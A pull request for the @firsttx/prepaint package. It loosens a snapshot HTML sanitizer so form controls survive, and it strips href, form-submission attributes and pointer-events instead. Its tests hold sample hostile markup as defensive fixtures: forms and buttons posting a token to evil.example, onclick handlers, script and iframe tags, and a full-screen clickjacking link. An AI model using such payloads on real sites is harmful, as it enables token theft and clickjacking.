### PR TITLE
fix(prepaint): keep form controls in restored snapshots

### DIFF
--- a/.changeset/restore-overlay-form-controls.md
+++ b/.changeset/restore-overlay-form-controls.md
@@ -1,0 +1,5 @@
+---
+'@firsttx/prepaint': minor
+---
+
+Keep form controls in the restored overlay so a revisit shows the screen the user actually left, and cut the interaction paths instead of the elements: `href`, `xlink:href`, form submission attributes (`action`, `formaction`, `method`, `formmethod`, `target`, `formtarget`), `autocomplete`, and inline `pointer-events` declarations are now stripped from every snapshot. Snapshot sanitization now removes only tags that execute code or load remote resources.

--- a/packages/prepaint/README.md
+++ b/packages/prepaint/README.md
@@ -287,7 +287,8 @@ const [data] = useModel(Model);
 
 Prepaint sanitizes all restored HTML to prevent XSS attacks:
 
-- Removes dangerous tags: `<script>`, `<iframe>`, `<form>`, `<object>`, etc.
+- Removes tags that execute code or load remote resources: `<script>`, `<iframe>`, `<object>`, `<embed>`, `<meta>`, `<link>`, `<base>`, etc.
+- Keeps form controls so the restored overlay matches the captured screen, and removes their interaction paths instead: `href`, `action`, `formaction`, `method`, `target`, `autocomplete`, and inline `pointer-events`.
 - Removes event handlers: `onclick`, `onerror`, `onload`, etc.
 - Blocks `javascript:` and `data:text/html` URLs
 

--- a/packages/prepaint/src/sanitize.ts
+++ b/packages/prepaint/src/sanitize.ts
@@ -1,21 +1,48 @@
-import { DANGEROUS_ATTRIBUTES, DANGEROUS_HTML_TAGS } from '@firsttx/shared';
+import { DANGEROUS_ATTRIBUTES } from '@firsttx/shared';
 
 type DOMPurifyLike = {
   sanitize: (html: string, config?: Record<string, unknown>) => string;
 };
 
+/**
+ * snapshot은 비대화형 overlay로만 재생된다. 따라서 제거 대상은
+ * "코드를 실행하거나 원격 리소스를 불러오는 태그"로 한정한다.
+ * form control은 그 자체로 위험하지 않고, 제거하면 복원된 화면에서
+ * 버튼·입력창이 통째로 사라진다. 대신 아래 STRIPPED_ATTRIBUTES가
+ * 제출·이동 경로를 끊는다.
+ */
+const SNAPSHOT_FORBIDDEN_TAGS = [
+  'script',
+  'iframe',
+  'object',
+  'embed',
+  'frame',
+  'frameset',
+  'meta',
+  'link',
+  'base',
+] as const;
+
+/**
+ * overlay는 클릭될 수 없어야 하지만 그 보장이 CSS(`pointer-events: none`)에만
+ * 있으면 캡처된 inline style이나 stylesheet가 되돌릴 수 있다. 이동·제출 대상을
+ * 속성 수준에서 제거해 클릭이 가능해져도 갈 곳이 없게 만든다.
+ */
+const STRIPPED_ATTRIBUTES = new Set([
+  'href',
+  'xlink:href',
+  'action',
+  'formaction',
+  'method',
+  'formmethod',
+  'target',
+  'formtarget',
+  'autocomplete',
+]);
+
 let cachedDOMPurify: DOMPurifyLike | null | undefined = undefined;
 const DANGEROUS_ATTRIBUTE_SET = new Set<string>(DANGEROUS_ATTRIBUTES);
-const URL_ATTRIBUTE_SET = new Set([
-  'action',
-  'background',
-  'cite',
-  'formaction',
-  'href',
-  'poster',
-  'src',
-  'xlink:href',
-]);
+const URL_ATTRIBUTE_SET = new Set(['background', 'cite', 'poster', 'src']);
 const RASTER_DATA_URL_PATTERN =
   /^data:image\/(?:png|jpeg|gif|webp|avif);base64,(?=[a-z0-9+/])((?:[a-z0-9+/]{4})*(?:[a-z0-9+/]{2}==|[a-z0-9+/]{3}=)?)$/i;
 
@@ -54,11 +81,18 @@ async function tryLoadDOMPurify(): Promise<DOMPurifyLike | null> {
   }
 }
 
+function stripInteractiveStyle(value: string): string {
+  return value
+    .split(';')
+    .filter((decl) => decl.slice(0, decl.indexOf(':')).trim().toLowerCase() !== 'pointer-events')
+    .join(';');
+}
+
 function fallbackSanitize(html: string): string {
   const parser = new DOMParser();
   const doc = parser.parseFromString(html, 'text/html');
 
-  DANGEROUS_HTML_TAGS.forEach((tag) => {
+  SNAPSHOT_FORBIDDEN_TAGS.forEach((tag) => {
     doc.querySelectorAll(tag).forEach((el) => el.remove());
   });
 
@@ -70,8 +104,16 @@ function fallbackSanitize(html: string): string {
     const attributes = Array.from(el.attributes);
     attributes.forEach((attr) => {
       const attrName = attr.name.toLowerCase();
-      if (DANGEROUS_ATTRIBUTE_SET.has(attrName) || attrName.startsWith('on')) {
+      if (
+        DANGEROUS_ATTRIBUTE_SET.has(attrName) ||
+        STRIPPED_ATTRIBUTES.has(attrName) ||
+        attrName.startsWith('on')
+      ) {
         el.removeAttribute(attr.name);
+        return;
+      }
+      if (attrName === 'style') {
+        el.setAttribute(attr.name, stripInteractiveStyle(attr.value));
         return;
       }
       if (URL_ATTRIBUTE_SET.has(attrName) && isUnsafeAttributeUrl(attr.value)) {
@@ -88,8 +130,8 @@ export async function sanitizeSnapshotHTML(html: string): Promise<string> {
 
   if (DOMPurify) {
     const sanitized = DOMPurify.sanitize(html, {
-      FORBID_TAGS: [...DANGEROUS_HTML_TAGS],
-      FORBID_ATTR: [...DANGEROUS_ATTRIBUTES],
+      FORBID_TAGS: [...SNAPSHOT_FORBIDDEN_TAGS],
+      FORBID_ATTR: [...DANGEROUS_ATTRIBUTES, ...STRIPPED_ATTRIBUTES],
       ALLOW_DATA_ATTR: false,
       ALLOW_ARIA_ATTR: true,
     });

--- a/packages/prepaint/tests/restore-fidelity.test.ts
+++ b/packages/prepaint/tests/restore-fidelity.test.ts
@@ -1,0 +1,114 @@
+import { describe, it, expect, beforeEach, afterEach } from 'vitest';
+import { captureSnapshot } from '../src/capture';
+import { mountOverlay, removeOverlay } from '../src/overlay';
+import type { PrepaintPolicy } from '../src/types';
+
+const TEST_POLICY = { routes: ['/'] } satisfies PrepaintPolicy;
+
+/**
+ * capture -> restore 전 구간의 시각 충실도를 검증한다.
+ *
+ * 기존 테스트는 단계별로만 검증한다. capture.test.ts는 capture 산출물을,
+ * sanitize.test.ts는 mount sanitizer를 각각 본다. 두 단계 사이에서
+ * 무엇이 사라지는지는 어느 쪽도 보지 않는다.
+ */
+
+function mountRestored(html: string): ShadowRoot {
+  mountOverlay(html);
+  const host = document.getElementById('__firsttx_prepaint__');
+  if (!host?.shadowRoot) throw new Error('overlay did not mount');
+  return host.shadowRoot;
+}
+
+describe('capture -> restore 시각 충실도', () => {
+  beforeEach(() => {
+    document.head.innerHTML = '';
+    document.body.innerHTML = `
+      <div id="root">
+        <div class="dashboard">
+          <h1>주문 관리</h1>
+          <input type="search" value="주문번호" placeholder="검색" />
+          <button type="button">새로고침</button>
+          <select><option>전체</option><option>배송중</option></select>
+          <table><tbody><tr><td>ORD-1001</td><td>배송중</td></tr></tbody></table>
+          <textarea>메모</textarea>
+        </div>
+      </div>
+    `;
+  });
+
+  afterEach(() => {
+    removeOverlay();
+  });
+
+  it('capture 단계는 form control을 보존한다', async () => {
+    const snapshot = await captureSnapshot(TEST_POLICY);
+
+    expect(snapshot).not.toBeNull();
+    expect(snapshot!.body).toContain('<button');
+    expect(snapshot!.body).toContain('<input');
+    expect(snapshot!.body).toContain('<select');
+    expect(snapshot!.body).toContain('<textarea');
+  });
+
+  it('restore 후에도 사용자가 보던 화면이 남아야 한다', async () => {
+    const snapshot = await captureSnapshot(TEST_POLICY);
+    const shadow = mountRestored(snapshot!.body);
+
+    // 텍스트·구조는 살아 있다
+    expect(shadow.querySelector('h1')?.textContent).toBe('주문 관리');
+    expect(shadow.querySelector('td')?.textContent).toBe('ORD-1001');
+
+    // 대상 사용자는 내부 도구(대시보드·CRM)다. 화면의 조작 요소가
+    // 통째로 사라지면 "직전 화면 재생"이라는 계약이 성립하지 않는다.
+    expect(shadow.querySelector('button'), '새로고침 버튼').not.toBeNull();
+    expect(shadow.querySelector('input'), '검색 입력창').not.toBeNull();
+    expect(shadow.querySelector('select'), '상태 필터').not.toBeNull();
+    expect(shadow.querySelector('textarea'), '메모 영역').not.toBeNull();
+  });
+
+  it('form control을 살려도 실행 가능한 것은 남지 않는다', async () => {
+    document.body.innerHTML = `
+      <div id="root">
+        <form action="https://evil.example/steal" method="post">
+          <input name="token" value="secret" />
+          <button onclick="steal()" formaction="https://evil.example/x">전송</button>
+        </form>
+        <script>alert(1)</script>
+        <iframe src="https://evil.example"></iframe>
+      </div>
+    `;
+
+    const snapshot = await captureSnapshot(TEST_POLICY);
+    const shadow = mountRestored(snapshot!.body);
+    const html = shadow.innerHTML;
+
+    // form control 자체는 남아 있어야 이 단언들이 공허하지 않다
+    expect(shadow.querySelector('form')).not.toBeNull();
+    expect(shadow.querySelector('button')).not.toBeNull();
+
+    expect(html).not.toContain('<script');
+    expect(html).not.toContain('<iframe');
+    expect(html).not.toContain('onclick');
+    expect(html).not.toContain('formaction');
+    expect(shadow.querySelector('form')?.getAttribute('action')).toBeNull();
+    expect(shadow.querySelector('form')?.getAttribute('method')).toBeNull();
+  });
+
+  it('덮어씌운 링크가 클릭될 수 있어도 갈 곳이 없다', async () => {
+    document.body.innerHTML = `
+      <div id="root">
+        <a href="https://evil.example"
+           style="pointer-events:auto; position:fixed; inset:0; z-index:9999">덮개</a>
+      </div>
+    `;
+
+    const snapshot = await captureSnapshot(TEST_POLICY);
+    const shadow = mountRestored(snapshot!.body);
+    const anchor = shadow.querySelector('a');
+
+    expect(anchor).not.toBeNull();
+    expect(anchor!.getAttribute('href')).toBeNull();
+    expect(anchor!.getAttribute('style')).not.toContain('pointer-events');
+  });
+});

--- a/packages/prepaint/tests/sanitize.test.ts
+++ b/packages/prepaint/tests/sanitize.test.ts
@@ -41,12 +41,23 @@ describe('sanitize', () => {
         expect(result).toContain('Content');
       });
 
-      it('removes form tags', () => {
-        const html = '<form action="/steal"><input type="text" /></form>';
+      it('keeps form controls but removes the submit path', () => {
+        const html = '<form action="/steal" method="post"><input type="text" /></form>';
         const result = sanitizeSnapshotHTMLSync(html);
 
-        expect(result).not.toContain('<form');
-        expect(result).not.toContain('<input');
+        expect(result).toContain('<form');
+        expect(result).toContain('<input');
+        expect(result).not.toContain('action=');
+        expect(result).not.toContain('method=');
+      });
+
+      it('removes formaction and formtarget from buttons', () => {
+        const html = '<button formaction="https://evil.example" formtarget="_blank">Send</button>';
+        const result = sanitizeSnapshotHTMLSync(html);
+
+        expect(result).toContain('<button');
+        expect(result).not.toContain('formaction');
+        expect(result).not.toContain('formtarget');
       });
 
       it('removes object and embed tags', () => {
@@ -216,12 +227,22 @@ describe('sanitize', () => {
         expect(result).toContain('alt="An image"');
       });
 
-      it('preserves anchor tags with safe href', () => {
+      it('preserves anchor tags but drops href entirely', () => {
         const html = '<a href="https://example.com">Link</a>';
         const result = sanitizeSnapshotHTMLSync(html);
 
-        expect(result).toContain('<a href="https://example.com">');
+        expect(result).toContain('<a>');
         expect(result).toContain('Link');
+        expect(result).not.toContain('href');
+      });
+
+      it('drops pointer-events from inline style so the overlay stays non-interactive', () => {
+        const html = '<div style="color:red; pointer-events:auto; position:fixed">x</div>';
+        const result = sanitizeSnapshotHTMLSync(html);
+
+        expect(result).toContain('color:red');
+        expect(result).toContain('position:fixed');
+        expect(result).not.toContain('pointer-events');
       });
 
       it('preserves data attributes except dangerous ones', () => {
@@ -493,11 +514,12 @@ describe('sanitize', () => {
     });
 
     it('handles textarea with dangerous content as text', () => {
-      // Note: textarea is in DANGEROUS_HTML_TAGS, so it gets removed
       const html = '<textarea><script>alert(1)</script></textarea>';
       const result = sanitizeSnapshotHTMLSync(html);
 
-      expect(result).not.toContain('<textarea');
+      expect(result).toContain('<textarea');
+      expect(result).toContain('&lt;script&gt;');
+      expect(result).not.toContain('<script');
     });
   });
 });


### PR DESCRIPTION
## What

- `packages/prepaint/src/sanitize.ts`: replace the shared `DANGEROUS_HTML_TAGS` list with a local
  `SNAPSHOT_FORBIDDEN_TAGS` that only covers tags which execute code or load remote resources
  (`script`, `iframe`, `object`, `embed`, `frame`, `frameset`, `meta`, `link`, `base`).
  `form`, `input`, `button`, `select`, and `textarea` are no longer removed.
- `packages/prepaint/src/sanitize.ts`: strip `href`, `xlink:href`, `action`, `formaction`,
  `method`, `formmethod`, `target`, `formtarget`, `autocomplete`, and inline `pointer-events`
  declarations from every snapshot.
- `packages/prepaint/tests/restore-fidelity.test.ts`: new end-to-end capture -> restore suite.
- `packages/prepaint/tests/sanitize.test.ts`: update three cases that encoded the old contract,
  add guards for the newly stripped attributes.
- `.changeset/restore-overlay-form-controls.md`: minor bump for `@firsttx/prepaint`.

## Why

The mount-time sanitizer removed every form control, so a restored snapshot lost all buttons,
inputs, selects, and textareas. Prepaint targets internal tools (dashboards, CRMs) where those
elements are most of the screen, which broke the core promise of replaying the last visual state.

Existing tests hid this. `capture.test.ts` asserted that capture preserves `<button>`, while
`sanitize.test.ts` asserted that the mount stage removes `<input>`. Both passed because no test
covered capture -> restore as one path.

Removing the tags also bought less than it appeared to. A snapshot could already carry
`<a href="https://...">` together with `style="pointer-events:auto;position:fixed;inset:0"`,
which reproduces a full-viewport clickable overlay without any form control. Cutting the
interaction paths at the attribute level closes that, and it does so without discarding markup
the user actually saw. Captured stylesheets still bypass sanitization, so `href` removal rather
than the `pointer-events` filter is the load-bearing guarantee here.

## Testing

- `pnpm turbo run test:run --filter=@firsttx/prepaint` — 13 files, 188 tests passed.
- `pnpm typecheck` — 11/11.
- `pnpm lint` — 11/11 (3 pre-existing warnings in `@firsttx/devtools`, unrelated).
- `pnpm test:run` — 10/10 workspaces.
- Not run: Playwright E2E, `pnpm build`, real-browser verification of the restored overlay.

---

**Breaking?** No. No API signature changes. Two observable behavior changes: restored overlays
now include form controls, and `<a>` elements no longer carry `href`, so `:link` styling will not
match inside the overlay.